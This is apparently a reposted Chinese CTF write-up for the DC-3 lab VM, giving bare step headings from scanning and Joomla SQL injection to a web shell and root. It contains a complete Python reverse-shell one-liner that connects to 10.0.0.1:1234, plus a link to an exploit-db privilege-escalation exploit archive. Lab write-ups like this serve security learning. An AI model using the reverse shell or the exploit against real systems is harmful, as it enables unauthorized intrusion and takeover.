DC-3 - 走看看

zoukankan html css js c++ java

DC-3

DC-3

探测IP

扫描主机

访问80

只有一个flag

扫描目录

whatweb查看

访问后台

搜索joomla漏洞

查看

利用sqlmap

库名

表名

字段名

数据

破解admin密码

登陆后台

写入shell

冰蝎连接

命令行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

编译可执行文件

获取root

涉及到的POC包：https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

查看全文

相关阅读:
【邀请函】小投入大产出—微软智能云(Azure)之CDN 专题
 Azure镜像市场再下一城，中标软件入驻开启Azure国产操作系统时代
 15分钟完成基于Azure公有云搭建远程测试环境
 独家秘笈！教你解锁移动应用新技能
 “剁手节”来了，红包你抢到了吗？
Azure 11 月新公布
 面对故宫万千珍宝，升哲科技如何做到“朕知道了”
高斯-克吕格投影
 cad定制快捷键
 matlab之scatter3()与plot3()函数

原文地址：https://www.cnblogs.com/liyu8/p/14508718.html

Copyright © 2011-2022 走看看